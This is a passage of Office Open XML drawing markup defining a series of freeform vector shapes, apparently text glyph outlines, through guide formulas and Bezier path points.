                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 84 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 93 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201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8 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186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1" name="Freeform 756">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32193102-D78F-411E-A205-66EB1253DAA7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3944938" y="3236913"/>
              <a:ext cx="106363" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 233"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 233"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 233 w 233"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 233"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 233"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 233"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 233"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 233"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 233"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 233"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 67 w 233"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 85 w 233"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 233"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 233"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 233"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 233"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 233"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 233"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 233"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 85 w 233"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 233"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 233"/>
                <a:gd name="T43" fmla="*/ 1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3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3" y="219"/>
                    <a:pt x="233" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233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3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6" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="57" y="32"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="85" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108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0" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="174"/>
                    <a:pt x="130" y="183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4" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131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2" name="Freeform 757">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E5E86EB-5CE9-47E7-A762-714569D3F639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57650" y="3209925"/>
              <a:ext cx="96838" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77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7 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92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3" name="Freeform 758">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5502A8-F20B-4F0C-B479-C67745460C9B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213225" y="3309938"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 62 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:move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7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4" name="Freeform 759">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975CEE09-C5B3-4DC8-AFF5-8C755B4E8096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457700" y="3309938"/>
              <a:ext cx="28575" cy="2857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5" name="Freeform 760">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A97274F-C781-47BD-848B-AFFF9A973C3E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578350" y="3309938"/>
              <a:ext cx="28575" cy="2857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0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0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49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6" name="Freeform 761">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1F20EB-2E8C-4321-B514-EB477BE3D92B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4699000" y="3309938"/>
              <a:ext cx="28575" cy="2857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7" name="Freeform 762">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D55D862-C40A-4EBC-98D4-E5851766BC0A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792663" y="3176588"/>
              <a:ext cx="60325" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 131"/>
                <a:gd name="T3" fmla="*/ 65 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 131"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 131"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 131"/>
                <a:gd name="T9" fmla="*/ 27 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 131"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 131"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 131"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131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194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="134"/>
                    <a:pt x="108" y="89"/>
                    <a:pt x="91" y="65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2"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="8" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="244"/>
                    <a:pt x="79" y="313"/>
                    <a:pt x="11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1" y="321"/>
                    <a:pt x="131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8" name="Freeform 763">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C171182D-AFC6-4D68-8742-355802D91163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4933950" y="3238500"/>
              <a:ext cx="34925" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 75"/>
                <a:gd name="T1" fmla="*/ 32 h 285"/>
                <a:gd name="T2" fmla="*/ 41 w 75"/>
                <a:gd name="T3" fmla="*/ 0 h 285"/>
                <a:gd name="T4" fmla="*/ 10 w 75"/>
                <a:gd name="T5" fmla="*/ 31 h 285"/>
                <a:gd name="T6" fmla="*/ 41 w 75"/>
                <a:gd name="T7" fmla="*/ 63 h 285"/>
                <a:gd name="T8" fmla="*/ 72 w 75"/>
                <a:gd name="T9" fmla="*/ 32 h 285"/>
                <a:gd name="T10" fmla="*/ 43 w 75"/>
                <a:gd name="T11" fmla="*/ 215 h 285"/>
                <a:gd name="T12" fmla="*/ 10 w 75"/>
                <a:gd name="T13" fmla="*/ 256 h 285"/>
                <a:gd name="T14" fmla="*/ 0 w 75"/>
                <a:gd name="T15" fmla="*/ 269 h 285"/>
                <a:gd name="T16" fmla="*/ 16 w 75"/>
                <a:gd name="T17" fmla="*/ 285 h 285"/>
                <a:gd name="T18" fmla="*/ 75 w 75"/>
                <a:gd name="T19" fmla="*/ 202 h 285"/>
                <a:gd name="T20" fmla="*/ 41 w 75"/>
                <a:gd name="T21" fmla="*/ 153 h 285"/>
                <a:gd name="T22" fmla="*/ 10 w 75"/>
                <a:gd name="T23" fmla="*/ 184 h 285"/>
                <a:gd name="T24" fmla="*/ 43 w 75"/>
                <a:gd name="T25" fmla="*/ 21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5">
                  <a:moveTo>
                    <a:pt x="72" y="32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3" y="0"/>
                    <a:pt x="10" y="16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60" y="63"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="72" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="18" y="252"/>
                    <a:pt x="10" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="257"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="276"/>
                    <a:pt x="8" y="285"/>
                    <a:pt x="16" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="285"/>
                    <a:pt x="75" y="258"/>
                    <a:pt x="75" y="202"/>
                  </a:cubicBez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9" name="Freeform 764">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A4BE25-74BB-4022-B8DB-D1A2EC6B9265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704850" y="3476625"/>
              <a:ext cx="87313" cy="142875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1 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81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1" y="120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0" name="Freeform 765">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5607B2BF-38A2-4E0E-95BC-A8E462380A66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809625" y="3516313"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 27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19 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33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19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8 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 188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8 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76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7"/>
                  </a:move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1" name="Freeform 766">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19177106-34B5-4AB7-A9B5-5A1EBDB80E7F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33450" y="3489325"/>
              <a:ext cx="96838" cy="131763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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91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3 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249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199" y="91"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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1"/>
                    <a:pt x="12" y="91"/>
                    <a:pt x="19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3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2" name="Freeform 767">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066855B-1B7C-44A5-9791-EDB249B2C9C8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1177925" y="3475038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9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9 h 308"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 278 h 308"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 278 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 293 h 308"/>
                <a:gd name="T38" fmla="*/ 20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8 h 308"/>
                <a:gd name="T46" fmla="*/ 105 w 197"/>
                <a:gd name="T47" fmla="*/ 278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9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9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20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6" y="278"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="278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3" name="Freeform 768">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB9D379-2128-42EA-89E2-430D6846A839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1290638" y="3516313"/>
              <a:ext cx="109538" cy="155575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0 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191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6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5 h 329"/>
                <a:gd name="T22" fmla="*/ 56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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="216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5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4" name="Freeform 769">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761AA3BF-7DDC-4A1D-A707-5656CE07A3F3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1416050" y="3516313"/>
              <a:ext cx="103188" cy="10318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5" name="Freeform 770">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136631A8-456A-4525-85C0-C2A1FA4BADE2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1546225" y="3476625"/>
              <a:ext cx="87313" cy="142875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0 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 80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0" y="120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6" name="Freeform 771">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6084DEC-4CDD-4034-81C4-E36262F65E07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1651000" y="3516313"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21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8 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229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49" y="218"/>
                    <a:pt x="249" y="203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7" name="Freeform 772">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA613E9-C458-466B-9765-8CA8B333D476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1774825" y="3489325"/>
              <a:ext cx="96838" cy="131763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7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7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8" name="Freeform 773">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EA8D57D-7C2F-4039-B320-527C9FB41BD8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1898650" y="3475038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9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9 h 308"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 278 h 308"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 278 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 293 h 308"/>
                <a:gd name="T38" fmla="*/ 21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8 h 308"/>
                <a:gd name="T46" fmla="*/ 105 w 197"/>
                <a:gd name="T47" fmla="*/ 278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9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9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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21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8"/>
                    <a:pt x="13" y="308"/>
                    <a:pt x="21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6" y="278"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="278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9" name="Freeform 774">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B695872-11EF-4C57-BDE6-8F7D20A6514D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2047875" y="3457575"/>
              <a:ext cx="61913" cy="180975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7 h 387"/>
                <a:gd name="T4" fmla="*/ 34 w 132"/>
                <a:gd name="T5" fmla="*/ 193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3 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 132"/>
                <a:gd name="T15" fmla="*/ 323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5"/>
                    <a:pt x="128" y="363"/>
                    <a:pt x="119" y="357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="316"/>
                    <a:pt x="34" y="249"/>
                    <a:pt x="34" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="144"/>
                    <a:pt x="53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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="298"/>
                    <a:pt x="40" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104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0" name="Freeform 775">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DCB95DA-7570-42E5-B64E-4BA51BDB95C6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135188" y="3476625"/>
              <a:ext cx="106363" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 231"/>
                <a:gd name="T1" fmla="*/ 168 h 305"/>
                <a:gd name="T2" fmla="*/ 139 w 231"/>
                <a:gd name="T3" fmla="*/ 168 h 305"/>
                <a:gd name="T4" fmla="*/ 157 w 231"/>
                <a:gd name="T5" fmla="*/ 196 h 305"/>
                <a:gd name="T6" fmla="*/ 174 w 231"/>
                <a:gd name="T7" fmla="*/ 176 h 305"/>
                <a:gd name="T8" fmla="*/ 174 w 231"/>
                <a:gd name="T9" fmla="*/ 129 h 305"/>
                <a:gd name="T10" fmla="*/ 157 w 231"/>
                <a:gd name="T11" fmla="*/ 109 h 305"/>
                <a:gd name="T12" fmla="*/ 139 w 231"/>
                <a:gd name="T13" fmla="*/ 137 h 305"/>
                <a:gd name="T14" fmla="*/ 72 w 231"/>
                <a:gd name="T15" fmla="*/ 137 h 305"/>
                <a:gd name="T16" fmla="*/ 72 w 231"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 196 w 231"/>
                <a:gd name="T19" fmla="*/ 31 h 305"/>
                <a:gd name="T20" fmla="*/ 196 w 231"/>
                <a:gd name="T21" fmla="*/ 57 h 305"/>
                <a:gd name="T22" fmla="*/ 213 w 231"/>
                <a:gd name="T23" fmla="*/ 78 h 305"/>
                <a:gd name="T24" fmla="*/ 231 w 231"/>
                <a:gd name="T25" fmla="*/ 57 h 305"/>
                <a:gd name="T26" fmla="*/ 231 w 231"/>
                <a:gd name="T27" fmla="*/ 21 h 305"/>
                <a:gd name="T28" fmla="*/ 211 w 231"/>
                <a:gd name="T29" fmla="*/ 0 h 305"/>
                <a:gd name="T30" fmla="*/ 21 w 231"/>
                <a:gd name="T31" fmla="*/ 0 h 305"/>
                <a:gd name="T32" fmla="*/ 0 w 231"/>
                <a:gd name="T33" fmla="*/ 16 h 305"/>
                <a:gd name="T34" fmla="*/ 21 w 231"/>
                <a:gd name="T35" fmla="*/ 31 h 305"/>
                <a:gd name="T36" fmla="*/ 37 w 231"/>
                <a:gd name="T37" fmla="*/ 31 h 305"/>
                <a:gd name="T38" fmla="*/ 37 w 231"/>
                <a:gd name="T39" fmla="*/ 275 h 305"/>
                <a:gd name="T40" fmla="*/ 21 w 231"/>
                <a:gd name="T41" fmla="*/ 275 h 305"/>
                <a:gd name="T42" fmla="*/ 0 w 231"/>
                <a:gd name="T43" fmla="*/ 290 h 305"/>
                <a:gd name="T44" fmla="*/ 21 w 231"/>
                <a:gd name="T45" fmla="*/ 305 h 305"/>
                <a:gd name="T46" fmla="*/ 97 w 231"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 117 w 231"/>
                <a:gd name="T49" fmla="*/ 290 h 305"/>
                <a:gd name="T50" fmla="*/ 97 w 231"/>
                <a:gd name="T51" fmla="*/ 275 h 305"/>
                <a:gd name="T52" fmla="*/ 72 w 231"/>
                <a:gd name="T53" fmla="*/ 275 h 305"/>
                <a:gd name="T54" fmla="*/ 72 w 231"/>
